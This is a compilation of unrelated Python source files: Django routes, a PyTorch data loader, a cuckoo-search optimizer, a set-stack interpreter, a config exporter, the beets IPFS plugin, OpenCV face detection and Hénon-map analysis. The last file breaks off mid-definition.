    path("event/<int:pk>/delete/", views.EventDelete.as_view(), name="delete_event"),
    path("routine/<int:pk>/", views.RoutineDetail.as_view(), name="routine_detail"),
    path("new_routine/", views.RoutineCreate.as_view(), name="create_routine"),
    path("routine/<int:pk>/edit/", views.RoutineUpdate.as_view(), name="edit_routine"),
    path(
        "routine/<int:pk>/delete/", views.RoutineDelete.as_view(), name="delete_routine"
    ),
    path("stats/", views.StatisticsView.as_view(), name="user_statistics"),
]
|
from .dataset import StandardDataset
from .sampler import SetSampler
import pickle
import torch
import config.paths_catalog as paths_catalog
import pandas as pd
# Registry mapping factory names (from the dataset catalog) to dataset classes.
D = {
    'StandardDataset': StandardDataset
}
def build_dataset(cfg, name, dataset_catalog, ratio=None, is_train=True, is_valid=False):
    """
    Arguments:
        name (str): name of the dataset
        dataset_catalog (DatasetCatalog): contains the information on how to construct a dataset.
        ratio (float): train/test ratio
        is_train (bool): whether to setup the dataset for training or testing
        is_valid (bool): whether to setup the dataset for validation

    Returns the dataset object built by the factory registered in ``D``.
    """
    assert (is_train and is_valid) == False
    data_config = dataset_catalog.get(cfg, name, ratio)
    factory = D[data_config['factory']]
    # load the dataset: features are all columns but the last, labels the last
    data = pd.read_csv(data_config['path'], header=None)
    x, y = data.iloc[:, :-1].values, data.iloc[:, -1].values
    # The three split branches only differed in the index-file key;
    # collapse the copy-pasted loading code into one path.
    if is_train:
        split_key = 'index_train'
    elif is_valid:
        split_key = 'index_valid'
    else:
        split_key = 'index_test'
    index = pd.read_csv(data_config[split_key]).values.reshape(-1)
    x, y = x[index], y[index]
    dataset = factory(cfg, x, y)
    return dataset
def load_dataset(cfg, train=True, valid=False):
    """Load raw (x, y) arrays for the requested train/valid/test split.

    Returns:
        tuple: (features, labels) restricted to the split's index file.
    """
    assert (train and valid) == False
    DatasetCatalog = paths_catalog.DatasetCatalog
    # The three branches only differed in dataset name and index-file key;
    # collapse the copy-pasted loading code into one path.
    if train:
        name, split_key = cfg.DATASET.TRAIN, 'index_train'
    elif valid:
        name, split_key = cfg.DATASET.VALID, 'index_valid'
    else:
        name, split_key = cfg.DATASET.TEST, 'index_test'
    data_config = DatasetCatalog.get(cfg, name, cfg.DATASET.RATIO)
    # load the dataset: features are all columns but the last, labels the last
    data = pd.read_csv(data_config['path'], header=None)
    x, y = data.iloc[:, :-1].values, data.iloc[:, -1].values
    index = pd.read_csv(data_config[split_key]).values.reshape(-1)
    x, y = x[index], y[index]
    return x, y
def make_data_sampler(dataset, shuffle):
    """Return a sequential sampler, or None when shuffling.

    Shuffling is delegated to the customized batch sampler, which is
    mutually exclusive with a per-element sampler.
    """
    if shuffle:
        return None
    return torch.utils.data.sampler.SequentialSampler(dataset)
def make_batch_sampler(cfg, dataset, is_train=True):
    """Training uses the custom SetSampler (maintains the imbalance ratio);
    evaluation falls back to the DataLoader's default batching (None)."""
    if not is_train:
        return None
    return SetSampler(dataset, cfg.DATALOADER.NUM_BATCH, cfg.DATALOADER.BATCH_SIZE)
def make_data_loader(cfg, is_train=True, is_valid=False):
    """Build a torch DataLoader for the requested train/valid/test split.

    Training shuffles (via the custom batch sampler); evaluation iterates
    sequentially.
    """
    assert (is_train and is_valid) == False
    # Only the dataset name differs per split; the redundant shuffle
    # if/else (shuffle is simply is_train) is folded away.
    if is_train:
        name = cfg.DATASET.TRAIN
    elif is_valid:
        name = cfg.DATASET.VALID
    else:
        name = cfg.DATASET.TEST
    dataset = build_dataset(cfg, name, paths_catalog.DatasetCatalog,
                            ratio=cfg.DATASET.RATIO,
                            is_train=is_train, is_valid=is_valid)
    data_sampler = make_data_sampler(dataset, shuffle=is_train)
    batch_sampler = make_batch_sampler(cfg, dataset, is_train=is_train)
    data_loader = torch.utils.data.DataLoader(
        dataset,
        num_workers=cfg.DATALOADER.NUM_WORKERS,
        sampler=data_sampler,
        batch_sampler=batch_sampler
    )
    return data_loader
|
import matplotlib.pyplot as plt
import numpy as np
import math
#INITIALIZATION
population_size = 50  # number of nests/cuckoos
max_generation = 122  # NOTE(review): unused — the loop below stops on fitness
_lambda = 1.5         # Levy-flight exponent
dimension = 2         # search-space dimensionality
max_domain = 500      # Schwefel domain upper bound
min_domain = -500     # Schwefel domain lower bound
step_size_cons = 0.01 # step-size scaling for Levy flights
Pa = 0.25             # abandonment probability
#OBJECTIVE FUNCTION
#OBJECTIVE FUNCTION
def schwefel(array):
    """Schwefel benchmark: f(x) = 418.9829*d - sum(x_i * sin(sqrt(|x_i|))).

    Global minimum is approximately 0 at x_i = 420.9687.
    """
    # Vectorized instead of a Python loop that shadowed the builtin `sum`.
    values = np.asarray(array, dtype=float)
    total = np.sum(values * np.sin(np.sqrt(np.abs(values))))
    fitness = 418.9829 * len(array) - total
    return fitness
#LEVY FLIGHT
#LEVY FLIGHT
def levy_flight(Lambda):
    """Draw a `dimension`-sized Levy-stable step via Mantegna's algorithm.

    u ~ N(0, sigma_u), v ~ N(0, 1), step = u / |v|^(1/Lambda).
    """
    # BUGFIX: Mantegna's sigma_u denominator is
    # Gamma((1+L)/2) * L * 2^((L-1)/2); the original's missing parentheses
    # *multiplied* by the 2^((L-1)/2) term and omitted the Lambda factor.
    sigma1 = np.power(
        (math.gamma(1 + Lambda) * np.sin((np.pi * Lambda) / 2))
        / (math.gamma((1 + Lambda) / 2) * Lambda * np.power(2, (Lambda - 1) / 2)),
        1 / Lambda,
    )
    sigma2 = 1
    u = np.random.normal(0, sigma1, size=dimension)
    v = np.random.normal(0, sigma2, size=dimension)
    step = u / np.power(np.fabs(v), 1 / Lambda)
    return step
class Indivisual:
    """(sic: "Individual") One nest/solution: a position in the search
    domain plus its cached Schwefel fitness.

    Reads the module-level constants dimension, max_domain, min_domain, Pa.
    """
    def __init__(self):
        # Uniform random position in [min_domain, max_domain]^dimension.
        self.__position = np.random.rand(dimension) * (max_domain - min_domain) + min_domain
        self.__fitness = schwefel(self.__position)
    def get_position(self):
        return self.__position
    def get_fitness(self):
        return self.__fitness
    def set_position(self, position):
        self.__position = position
    def set_fitness(self, fitness):
        self.__fitness = fitness
    def abandon(self):
        # abandon some variables: re-randomize each coordinate with
        # probability Pa, then refresh the cached fitness
        for i in range(len(self.__position)):
            p = np.random.rand()
            if p < Pa:
                self.__position[i] = np.random.rand() * (max_domain - min_domain) + min_domain
        self.__fitness = schwefel(self.__position)
def main():
    """Run cuckoo search on the Schwefel function and plot progress.

    BUGFIX: the original reused `i` for the generation loop, the randomly
    chosen cuckoo, AND the boundary-clipping loop, so the updated position
    and fitness were always written to the index left over from the
    clipping loop instead of the chosen cuckoo.  Distinct names are used
    for each role below.
    """
    #RANDOMLY CREATING HOSTS
    cs_list = []
    for _ in range(population_size):
        cs_list.append(Indivisual())
    #SORT TO GET THE BEST FITNESS
    cs_list = sorted(cs_list, key=lambda ID: ID.get_fitness())
    best_fitness = cs_list[0].get_fitness()
    fig = plt.figure()
    #INITIAL POPULATION DISTRIBUTION
    ax1 = fig.add_subplot(131)
    for member in cs_list:
        ax1.scatter([member.get_position()[0]], [member.get_position()[1]])
    ax1.set_title('Initial Population Distributtion')
    ax1.set_xlabel('x-axis')
    ax1.set_ylabel('y-axis')
    ax3 = fig.add_subplot(133)
    t = 1
    while best_fitness > 0.009:
        #GENERATING NEW SOLUTIONS
        for _ in range(population_size):
            #CHOOSING A RANDOM CUCKOO (say c)
            c = np.random.randint(low=0, high=population_size)
            #SETTING ITS POSITION USING LEVY FLIGHT
            position = cs_list[c].get_position() + (step_size_cons * levy_flight(_lambda))
            # Simple Boundary Rule: clip each coordinate to the domain
            for d in range(len(position)):
                if position[d] > max_domain:
                    position[d] = max_domain
                if position[d] < min_domain:
                    position[d] = min_domain
            cs_list[c].set_position(position)
            cs_list[c].set_fitness(schwefel(cs_list[c].get_position()))
            #CHOOSING A RANDOM HOST (say j), distinct from c
            j = np.random.randint(0, population_size)
            while j == c:
                j = np.random.randint(0, population_size)
            #RELAXATION: replace host j if the cuckoo's egg is better (lower)
            if cs_list[j].get_fitness() > cs_list[c].get_fitness():
                cs_list[j].set_position(cs_list[c].get_position())
                cs_list[j].set_fitness(cs_list[c].get_fitness())
        #SORT (to Keep Best)
        cs_list = sorted(cs_list, key=lambda ID: ID.get_fitness())
        #ABANDON SOLUTION (exclude the best)
        for a in range(1, population_size):
            if np.random.rand() < Pa:
                cs_list[a].abandon()
        #RANKING THE CS LIST
        cs_list = sorted(cs_list, key=lambda ID: ID.get_fitness())
        #FIND THE CURRENT BEST
        if cs_list[0].get_fitness() < best_fitness:
            best_fitness = cs_list[0].get_fitness()
        #PRINTING SOLUTION IN EACH ITERATION
        print("iteration =", t, " best_fitness =", best_fitness)
        #FITNESS PLOTTING
        ax3.scatter(t, best_fitness)
        t += 1
    #GRAPH FOR FITNESS
    ax3.set_title('Fitness Curve')
    ax3.set_xlabel('x-axis')
    ax3.set_ylabel('y-axis')
    # FINAL POPULATION DISTRIBUTION
    ax2 = fig.add_subplot(132)
    for member in cs_list:
        ax2.scatter([member.get_position()[0]], [member.get_position()[1]])
    ax2.set_title('Final Population Distributtion after '+str(t)+' iterations')
    ax2.set_xlabel('x-axis')
    ax2.set_ylabel('y-axis')
    #SHOWING GRAPH
    plt.show()
# Run the optimizer only when executed as a script.
if __name__ == "__main__":
    main()
def execute(infn):
    """Run the set-stack programs described in file *infn*.

    File format: first line = number of programs; each program gives an
    instruction count followed by that many instructions (PUSH, DUP,
    UNION, INTERSECT, ADD).  After each program the final stack and the
    size of its top set are printed, followed by '***'.

    Fixes vs the original: Python 2 print statements (a SyntaxError in an
    otherwise Python 3 codebase), the file handle was never closed, and
    readline() keeps the trailing newline, so the instruction comparisons
    could never match.
    """
    with open(infn, 'r') as f:
        programs = int(f.readline())
        for _ in range(programs):
            stack = []
            instructions = int(f.readline())
            for _ in range(instructions):
                # strip the newline that readline() keeps
                instr = f.readline().strip()
                if 'PUSH' == instr:
                    stack.append(frozenset())
                if 'DUP' == instr:
                    stack.append(stack[-1])
                if 'UNION' == instr:
                    first = stack.pop()
                    second = stack.pop()
                    stack.append(first | second)
                if 'INTERSECT' == instr:
                    first = stack.pop()
                    second = stack.pop()
                    stack.append(first & second)
                if 'ADD' == instr:
                    # push (second + {first}) as a frozenset
                    first = stack.pop()
                    second = set(stack.pop())
                    second.add(first)
                    stack.append(frozenset(second))
            print(stack)
            print(len(stack[-1]))
            print('***')
|
import json
import os

import db
def write_page_flag(Mission_Id):
    """Fetch the page flag for a mission from the DB and persist it."""
    flags = db.get_page_flag(Mission_Id, 1)
    print(flags)
    save_data(flags, '%s_page_flag' % Mission_Id)
def write_page_config(Mission_Id):
    """Fetch and persist the config of pages 0-9 for a mission.

    Pages with no config are skipped with a notice.
    """
    for page_no in range(10):
        config = db.get_page_config(Mission_Id, page_no, 1)
        if len(config) == 0:
            print('No config in page %d' % page_no)
            continue
        save_data(config, '%s_page_config_page%s' % (Mission_Id, str(page_no)))
def save_data(content, filename):
    """Write *content* (a list of JSON-serializable items), one JSON
    document per line, to ../config/<filename>.npy.

    Fixes: the path was built with a hard-coded Windows separator inside a
    raw string, which does not resolve as a directory on POSIX, and the
    target directory was never created (the original had its makedir call
    commented out).
    """
    config_dir = os.path.join('..', 'config')
    os.makedirs(config_dir, exist_ok=True)
    file_dir = os.path.join(config_dir, '%s.npy' % filename)
    with open(file_dir, 'w') as f:
        for info in content:
            f.write(json.dumps(info))
            f.write('\n')
def read_data(filename):
    """Load records previously written by save_data: one JSON document per
    line from ``..\\config\\<filename>.npy``.  Blank lines are skipped.
    Returns the parsed records as a list."""
    file_dir = r'..\config\%s.npy' % filename
    with open(file_dir, 'r') as f:
        # same filter as the original loop: only a bare newline is skipped
        return [json.loads(line) for line in f.readlines() if line != '\n']
def write_mission_config():
    """Export both the page flags and the per-page configs for mission 10002."""
    mission = '10002'
    write_page_flag(mission)
    write_page_config(mission)
# Script entry point: dump mission 10002's flags and configs to ..\config\.
if __name__ == '__main__':
    write_mission_config()
|
# This file is part of beets.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Adds support for ipfs. Requires go-ipfs and a running ipfs daemon
"""
from beets import ui, util, library, config
from beets.plugins import BeetsPlugin
from beets.util import syspath
import subprocess
import shutil
import os
import tempfile
class IPFSPlugin(BeetsPlugin):
    """Beets plugin that stores/retrieves albums via ipfs.

    Adds `beet ipfs` with options to add albums to ipfs, fetch them back
    by hash, publish the local library, import remote libraries and play
    from them.  With config `auto: yes` every imported album is added to
    ipfs automatically.
    """
    def __init__(self):
        super().__init__()
        self.config.add({
            'auto': True,
            'nocopy': False,
        })
        if self.config['auto']:
            self.import_stages = [self.auto_add]
    def commands(self):
        """Register the `ipfs` subcommand and its option handlers."""
        cmd = ui.Subcommand('ipfs',
                            help='interact with ipfs')
        cmd.parser.add_option('-a', '--add', dest='add',
                              action='store_true',
                              help='Add to ipfs')
        cmd.parser.add_option('-g', '--get', dest='get',
                              action='store_true',
                              help='Get from ipfs')
        cmd.parser.add_option('-p', '--publish', dest='publish',
                              action='store_true',
                              help='Publish local library to ipfs')
        cmd.parser.add_option('-i', '--import', dest='_import',
                              action='store_true',
                              help='Import remote library from ipfs')
        cmd.parser.add_option('-l', '--list', dest='_list',
                              action='store_true',
                              help='Query imported libraries')
        cmd.parser.add_option('-m', '--play', dest='play',
                              action='store_true',
                              help='Play music from remote libraries')
        def func(lib, opts, args):
            if opts.add:
                for album in lib.albums(ui.decargs(args)):
                    if len(album.items()) == 0:
                        self._log.info('{0} does not contain items, aborting',
                                       album)
                        # BUG FIX: the log promises to abort but the original
                        # fell through and added the empty album anyway
                        continue
                    self.ipfs_add(album)
                    album.store()
            if opts.get:
                self.ipfs_get(lib, ui.decargs(args))
            if opts.publish:
                self.ipfs_publish(lib)
            if opts._import:
                self.ipfs_import(lib, ui.decargs(args))
            if opts._list:
                self.ipfs_list(lib, ui.decargs(args))
            if opts.play:
                self.ipfs_play(lib, opts, ui.decargs(args))
        cmd.func = func
        return [cmd]
    def auto_add(self, session, task):
        """Import-pipeline stage: add each imported album to ipfs."""
        if task.is_album:
            if self.ipfs_add(task.album):
                task.album.store()
    def ipfs_play(self, lib, opts, args):
        """Play albums from the joined remote library via the play plugin."""
        from beetsplug.play import PlayPlugin
        jlib = self.get_remote_lib(lib)
        player = PlayPlugin()
        config['play']['relative_to'] = None
        player.album = True
        player.play_music(jlib, player, args)
    def ipfs_add(self, album):
        """Add *album*'s directory to ipfs and store the returned hashes on
        the album and its items.  Returns True on success, False otherwise
        (no item dir, already added, or the ipfs command failed)."""
        try:
            album_dir = album.item_dir()
        except AttributeError:
            return False
        try:
            if album.ipfs:
                self._log.debug('{0} already added', album_dir)
                # Already added to ipfs
                return False
        except AttributeError:
            pass
        self._log.info('Adding {0} to ipfs', album_dir)
        if self.config['nocopy']:
            cmd = "ipfs add --nocopy -q -r".split()
        else:
            cmd = "ipfs add -q -r".split()
        cmd.append(album_dir)
        try:
            output = util.command_output(cmd).stdout.split()
        except (OSError, subprocess.CalledProcessError) as exc:
            self._log.error('Failed to add {0}, error: {1}', album_dir, exc)
            return False
        length = len(output)
        for linenr, line in enumerate(output):
            line = line.strip()
            if linenr == length - 1:
                # last printed line is the album hash
                self._log.info("album: {0}", line)
                album.ipfs = line
            else:
                try:
                    item = album.items()[linenr]
                    self._log.info("item: {0}", line)
                    item.ipfs = line
                    item.store()
                except IndexError:
                    # if there's non music files in the to-add folder they'll
                    # get ignored here
                    pass
        return True
    def ipfs_get(self, lib, query):
        """Fetch album(s) from ipfs: *query* is either a raw hash or a
        library query resolving to albums that carry an ipfs hash."""
        query = query[0]
        # Check if query is a hash
        # TODO: generalize to other hashes; probably use a multihash
        # implementation
        if query.startswith("Qm") and len(query) == 46:
            self.ipfs_get_from_hash(lib, query)
        else:
            albums = self.query(lib, query)
            for album in albums:
                self.ipfs_get_from_hash(lib, album.ipfs)
    def ipfs_get_from_hash(self, lib, _hash):
        """Download one hash from ipfs, import it into *lib* interactively,
        then remove the downloaded working copy."""
        try:
            cmd = "ipfs get".split()
            cmd.append(_hash)
            util.command_output(cmd)
        except (OSError, subprocess.CalledProcessError) as err:
            self._log.error('Failed to get {0} from ipfs.\n{1}',
                            _hash, err.output)
            return False
        self._log.info('Getting {0} from ipfs', _hash)
        imp = ui.commands.TerminalImportSession(lib, loghandler=None,
                                                query=None, paths=[_hash])
        imp.run()
        # This uses a relative path, hence we cannot use util.syspath(_hash,
        # prefix=True). However, that should be fine since the hash will not
        # exceed MAX_PATH.
        shutil.rmtree(syspath(_hash, prefix=False))
    def ipfs_publish(self, lib):
        """Export the ipfs-tracked part of *lib* to a temp db, add that db
        to ipfs and log the resulting library hash."""
        with tempfile.NamedTemporaryFile() as tmp:
            self.ipfs_added_albums(lib, tmp.name)
            try:
                if self.config['nocopy']:
                    cmd = "ipfs add --nocopy -q ".split()
                else:
                    cmd = "ipfs add -q ".split()
                cmd.append(tmp.name)
                output = util.command_output(cmd).stdout
            except (OSError, subprocess.CalledProcessError) as err:
                msg = f"Failed to publish library. Error: {err}"
                self._log.error(msg)
                return False
            self._log.info("hash of library: {0}", output)
    def ipfs_import(self, lib, args):
        """Fetch a published library db by hash into <libdir>/remotes and
        merge its albums into the combined joined.db library."""
        _hash = args[0]
        if len(args) > 1:
            lib_name = args[1]
        else:
            lib_name = _hash
        lib_root = os.path.dirname(lib.path)
        remote_libs = os.path.join(lib_root, b"remotes")
        if not os.path.exists(remote_libs):
            try:
                os.makedirs(remote_libs)
            except OSError as e:
                msg = f"Could not create {remote_libs}. Error: {e}"
                self._log.error(msg)
                return False
        path = os.path.join(remote_libs, lib_name.encode() + b".db")
        if not os.path.exists(path):
            cmd = f"ipfs get {_hash} -o".split()
            cmd.append(path)
            try:
                util.command_output(cmd)
            except (OSError, subprocess.CalledProcessError):
                self._log.error(f"Could not import {_hash}")
                return False
        # add all albums from remotes into a combined library
        jpath = os.path.join(remote_libs, b"joined.db")
        jlib = library.Library(jpath)
        nlib = library.Library(path)
        for album in nlib.albums():
            if not self.already_added(album, jlib):
                new_album = []
                for item in album.items():
                    item.id = None
                    new_album.append(item)
                added_album = jlib.add_album(new_album)
                added_album.ipfs = album.ipfs
                added_album.store()
    def already_added(self, check, jlib):
        """True if an album with *check*'s MusicBrainz id is already in jlib."""
        for jalbum in jlib.albums():
            if jalbum.mb_albumid == check.mb_albumid:
                return True
        return False
    def ipfs_list(self, lib, args):
        """Print albums from the joined remote library matching *args*."""
        fmt = config['format_album'].get()
        try:
            albums = self.query(lib, args)
        except OSError:
            ui.print_("No imported libraries yet.")
            return
        for album in albums:
            ui.print_(format(album, fmt), " : ", album.ipfs.decode())
    def query(self, lib, args):
        """Run an album query against the joined remote library."""
        rlib = self.get_remote_lib(lib)
        albums = rlib.albums(args)
        return albums
    def get_remote_lib(self, lib):
        """Open <libdir>/remotes/joined.db; raises OSError when missing."""
        lib_root = os.path.dirname(lib.path)
        remote_libs = os.path.join(lib_root, b"remotes")
        path = os.path.join(remote_libs, b"joined.db")
        if not os.path.isfile(path):
            raise OSError
        return library.Library(path)
    def ipfs_added_albums(self, rlib, tmpname):
        """ Returns a new library with only albums/items added to ipfs
        """
        tmplib = library.Library(tmpname)
        for album in rlib.albums():
            try:
                if album.ipfs:
                    self.create_new_album(album, tmplib)
            except AttributeError:
                pass
        return tmplib
    def create_new_album(self, album, tmplib):
        """Copy *album* into *tmplib* with item paths rewritten to their
        /ipfs/<hash>/ locations.  Albums containing any item without an
        ipfs hash are skipped entirely (the break below)."""
        items = []
        for item in album.items():
            try:
                if not item.ipfs:
                    break
            except AttributeError:
                pass
            item_path = os.path.basename(item.path).decode(
                util._fsencoding(), 'ignore'
            )
            # Clear current path from item
            item.path = f'/ipfs/{album.ipfs}/{item_path}'
            item.id = None
            items.append(item)
        if len(items) < 1:
            return False
        self._log.info("Adding '{0}' to temporary library", album)
        new_album = tmplib.add_album(items)
        new_album.ipfs = album.ipfs
        new_album.store(inherit=False)
|
# This file conveniently draws the bboxes from a given video file instead of your webcam. It's all ran from 1 function.
# It will plot the centroid bounding box in red and the original detected faces in blue.
import cv2
import numpy as np
# Used for clustering ( groupRectangles() )
eps = 1.5
face_cascade = cv2.CascadeClassifier('/Users/jeremy.meyer/opencv/data/haarcascades/haarcascade_frontalface_default.xml')
# Draws bounding box and text from coordinates.
def bbox(img, x1, y1, x2, y2, base_color=(255, 0, 0), text='Human Detected'):
    """Draw a labelled bounding box on *img* in place.

    The box is outlined in *base_color*; the label sits in a darker filled
    strip above the box, or below it when the box touches the top of the
    frame (y1 <= 20).
    """
    label_w = 12 * len(text)  # rough width: ~12 px per character
    label_h = 17
    fill = np.array(base_color) / 5  # darker shade for the label strip
    cv2.rectangle(img, (x1, y1), (x2, y2), base_color, 2)
    if y1 > 20:
        # enough room above the box: draw the label strip on top
        strip_top, strip_bottom, text_y = y1 - label_h, y1 - 1, y1 - 5
    else:
        # box touches the frame's top edge: hang the label underneath
        strip_top, strip_bottom, text_y = y2 + label_h, y2 + 1, y2 + label_h - 5
    cv2.rectangle(img, (x1, strip_top), (x1 + label_w, strip_bottom), fill, -1)
    cv2.putText(img, text, (x1, text_y), cv2.FONT_HERSHEY_SIMPLEX, 0.5, base_color)
def readvideo(filepath, fps, playback_multiplier=1):
    """Play the video at *filepath*, detecting faces in every frame.

    Raw Haar-cascade detections are drawn in blue and the clustered
    ("averaged") boxes from cv2.groupRectangles in red.  Playback runs at
    fps * playback_multiplier; press 'q' to stop early.
    """
    capture = cv2.VideoCapture(filepath)
    # per-frame wait in ms, hoisted out of the loop (loop-invariant)
    delay_ms = round(1000 / fps * 1 / playback_multiplier)
    while capture.isOpened():
        ok, frame = capture.read()
        if not ok:
            break
        gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
        detections = face_cascade.detectMultiScale(gray)
        clustered = cv2.groupRectangles(list(detections), 1, eps=eps)
        # raw detections in blue
        for (x, y, w, h) in detections:
            bbox(frame, x, y, x + w, y + h, (255, 175, 0))
        # averaged cluster boxes in red
        for (x, y, w, h) in clustered[0]:
            bbox(frame, x, y, x + w, y + h, (0, 0, 255), "Human (Averaged)")
        cv2.imshow('playback', frame)
        if cv2.waitKey(delay_ms) == ord('q'):
            break
    cv2.destroyAllWindows()
    capture.release()
# Example:
# NOTE(review): this call runs at import time; wrap it in
# `if __name__ == '__main__':` if this file is ever imported as a module.
readvideo('testVid.mp4', 15, 2)
|
import numpy as np
from math import log2
import scipy.optimize as optimization
from matplotlib.pyplot import figure, show, cm
import full_henon as fh
import helper as he
def closest(lst, val):
    """Return (value, index) of the element of *lst* nearest to *val*.

    Ties resolve to the first (lowest-index) nearest element, matching
    numpy's argmin behaviour.
    """
    arr = np.asarray(lst)
    idx = np.abs(arr - val).argmin()
    return arr[idx], idx
def return_plot(xS, yS, its, a, b, saveFig=None):
    """Scatter the x coordinates of one Hénon orbit against those of a
    slightly perturbed orbit (offset 1e-5), illustrating sensitivity to
    initial conditions.  Saved to *saveFig* when given, otherwise shown.
    """
    offset = 1e-5
    xv, _ = fh.Henon(xS, yS, its, a, b)                    # reference orbit
    x_perturbed, _ = fh.Henon(xS + offset, yS + offset, its, a, b)
    fig = figure(figsize=(15, 6))
    frame = fig.add_subplot(1, 1, 1)
    frame.scatter(xv, x_perturbed, color="navy", marker="o", s=0.01)
    frame.set_xlabel("$x_n$", fontsize=20)
    frame.set_ylabel("$x_{n+1}$", fontsize=20)
    frame.grid(zorder=2)
    if saveFig:
        fig.savefig(str(saveFig))
    else:
        show()
def hist_plot(xv, nBins, saveFig=None):
    """Draw a frequency histogram of the sample *xv* with *nBins* bins.

    The figure is written to *saveFig* when a path is given and displayed
    interactively otherwise.
    """
    hist_fig = figure(figsize=(15, 8))
    axes = hist_fig.add_subplot(1, 1, 1)
    axes.hist(xv, nBins, label="$x$", color="teal", rwidth=0.9)
    axes.set_xlabel("$x$", fontsize=20)
    axes.set_ylabel("Frequency", fontsize=20)
    axes.tick_params(axis="both", labelsize=15)
    if saveFig:
        hist_fig.savefig(saveFig)
    else:
        show()
def box_henon(xv, yv, nBoxes, xSpace=0.05, ySpace=0.05, saveFig=None):
    """Plot the Hénon attractor overlaid with an nBoxes x nBoxes grid.

    Each grid cell gets a numeric label (1..nBoxes**2).  xSpace/ySpace pad
    the data range on each side; the figure is saved to *saveFig* when
    given, otherwise shown.
    """
    xMin, xMax = min(xv)-xSpace, max(xv)+xSpace # x limit of plot
    yMin, yMax = min(yv)-ySpace, max(yv)+ySpace # y limit of plot
    xBoxes = np.linspace(xMin, xMax, nBoxes+1) # x coordinates of box lines
    yBoxes = np.linspace(yMin, yMax, nBoxes+1) # y coordinates of box lines
    totBoxes = nBoxes * nBoxes # Number of boxes
    text = np.linspace(1, totBoxes, totBoxes, dtype=int) # Labels
    # Determining height of labels in plot
    if nBoxes >= 4:
        ySize = 4 * (max(yBoxes) - min(yBoxes)) / (nBoxes * len(yBoxes))
    else: ySize = (max(yBoxes) - min(yBoxes)) / len(yBoxes)
    pad = 0.08 / nBoxes # x padding for text
    # Finding the locations of the text labels
    # NOTE(review): xLocations indexes xBoxes with the *inner* loop variable
    # (yInd) while yLocations indexes yBoxes with the *outer* one (xInd), so
    # label numbering runs column-major across the grid.  Confirm this is
    # the ordering intended to match weight_boxes/inform_dim.
    xLocations = [xBoxes[yInd] + pad for xInd in range(len(xBoxes)-1)
                  for yInd in range(len(yBoxes)-1)]
    yLocations = [yBoxes[xInd] + ySize for xInd in range(len(xBoxes)-1)
                  for yInd in range(len(yBoxes)-1)]
    # Plotting
    fig = figure(figsize=(15,8))
    frame = fig.add_subplot(1,1,1)
    frame.scatter(xv, yv, s=0.5, color="navy") # The Hénon map
    for xLim in xBoxes:
        frame.axvline(xLim, color="k", lw=1.3, zorder=3) # Vertical box lines
    for yLim in yBoxes:
        frame.axhline(yLim, color="k", lw=1.3, zorder=3) # Horizontal box lines
    # Adding text
    for i in range(len(xLocations)):
        frame.text(xLocations[i], yLocations[i], text[i], fontsize=15, zorder=3)
    # Setting axes
    frame.set_xlabel("$x$", fontsize=20)
    frame.set_ylabel("$y$", fontsize=20)
    frame.tick_params(axis="both", labelsize=15)
    # Setting plot limits
    frame.set_xlim(xMin, xMax)
    frame.set_ylim(yMin, yMax)
    if saveFig: fig.savefig(saveFig)
    else: show()
def mean_fig(nSize, nRuns):
    """Plot the ratio of geometric over arithmetic mean for *nRuns* random
    samples of size *nSize*; by the AM-GM inequality the ratio is < 1.
    """
    nSize = int(nSize)
    ratios = []
    for _ in range(nRuns):
        sample = np.random.uniform(low=1e-2, high=5, size=nSize)  # Random
        geometric = np.prod(sample)**(1/nSize)      # Geometric mean
        arithmetic = sum(sample) / nSize            # Arithmetic mean
        ratios.append(geometric / arithmetic)
    # Scatter of sorted (1 - ratio) plus a step histogram on a twin axis
    fig = figure(figsize=(15,8))
    frame = fig.add_subplot(1,1,1)
    frame2 = frame.twinx()
    frame.scatter(np.asarray(range(nRuns))/nRuns, 1-np.sort(ratios),
                  color="teal", marker="o", s=5)
    frame2.hist(1-np.asarray(ratios), bins=int(nRuns/50), density=True,
                histtype="step", color="forestgreen", lw=1.5)
    frame.set_xlabel("Run")
    frame.set_ylabel("Ratio")
    frame.grid()
    show()
def weight_boxes(x, y, start, power, plot=False, text=False):
    """Count orbit points per grid cell and return the normalized weights.

    The plane is split into start**power x start**power boxes covering the
    (padded) data range; each point (x[i], y[i]) increments its box.  The
    returned matrix sums to 1 (box occupation probabilities).  With
    plot=True the raw counts are shown as an image; text=True additionally
    prints each normalized weight in its cell.
    """
    nBox = start**power # Number of boxes
    boxes = np.zeros((nBox, nBox)) # Creating the boxes
    xCoords = np.linspace(min(x)-.1, max(x)+.1, nBox+1) # x limits of boxes
    yCoords = np.linspace(min(y)-.05, max(y)+.05, nBox+1) # y limits of boxes
    # NOTE(review): the loop variable deliberately shadows the parameter x;
    # enumerate(x) is evaluated once so iteration is unaffected, but the
    # name is reused as the current point below — confirm before renaming.
    for ind, x in enumerate(x):
        # closest() returns (value, index) of the nearest grid line; step
        # back one cell when the point lies at/below that line
        xV, xPos = closest(xCoords, x)
        yV, yPos = closest(yCoords, y[ind])
        if x <= xV: xPos -= 1
        if y[ind] <= yV: yPos -= 1
        # NOTE(review): yPos is clamped at -1 -> 0 but xPos has no matching
        # clamp; an xPos of -1 would wrap to the last column — verify this
        # cannot occur for the padded xCoords range.
        if yPos == -1: yPos = 0
        # row index is flipped so row 0 is the top of the plot
        boxes[abs(nBox-1-yPos)][xPos] += 1
    # Normalizing boxes
    redBox = boxes / np.sum(boxes)
    if plot:
        # Plotting
        fig = figure(figsize=(14,8))
        frame = fig.add_subplot(1,1,1)
        if text:
            for xInd in range(len(xCoords)-1):
                for yInd in range(len(yCoords)-1):
                    label = f"{redBox[yInd][xInd]:.3f}"
                    frame.text(xCoords[xInd], yCoords[yInd], label,
                               va='center', ha='center')
        im = frame.imshow(boxes, cmap=cm.inferno)
        fig.colorbar(im)
        show()
    return redBox
def inform_dim(x, y, start, power):
    """Shannon information (in bits) of the box-occupation probabilities of
    the orbit — the quantity fitted against k to estimate the information
    dimension of the Hénon attractor."""
    weights = weight_boxes(x, y, start, power)
    # I = -sum p*log2(p) over non-empty boxes (-log p = log 1/p)
    information = 0
    for row in weights:
        for p in row:
            if p != 0:
                information -= p * log2(p)
    return information
def change_dim(base, pRange, xv, yv, saveFig=None):
